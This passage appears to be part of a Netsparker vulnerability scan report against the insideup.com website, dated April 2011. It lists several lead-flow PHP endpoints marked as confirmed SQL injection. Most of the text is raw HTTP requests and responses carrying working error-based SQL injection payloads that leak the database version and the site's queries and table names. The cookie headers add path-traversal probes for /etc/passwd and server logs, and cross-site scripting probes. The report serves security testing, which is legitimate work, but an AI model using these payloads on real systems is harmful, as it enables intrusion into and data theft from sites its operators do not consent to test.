cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=97ssd719pgv7qgc689p4am0r33; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/parl00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=55goopk5csis14ucrp3ihleh33; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lodi00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
